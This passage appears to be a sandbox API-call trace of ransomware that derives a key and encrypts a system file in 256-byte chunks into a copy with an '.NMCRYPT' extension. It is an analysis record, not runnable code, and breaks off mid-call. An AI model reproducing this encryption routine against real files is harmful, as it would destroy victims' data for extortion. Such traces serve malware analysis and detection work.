(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.587] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.587] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0151.588] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0151.588] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.588] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad638) returned 1 [0151.588] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0151.588] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0151.588] wcslen (_String="\\\\?\\") returned 0x4 [0151.588] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0151.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0151.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0151.589] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=23552) returned 1 [0151.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0151.589] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.646] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.646] GetLastError () returned 0x0 [0151.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.647] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.648] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.648] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.648] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.649] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.649] GetLastError () returned 0x0 [0151.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.649] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.650] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.650] GetLastError () returned 0x0 [0151.650] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.650] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.651] GetLastError () returned 0x0 [0151.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.651] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.651] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, 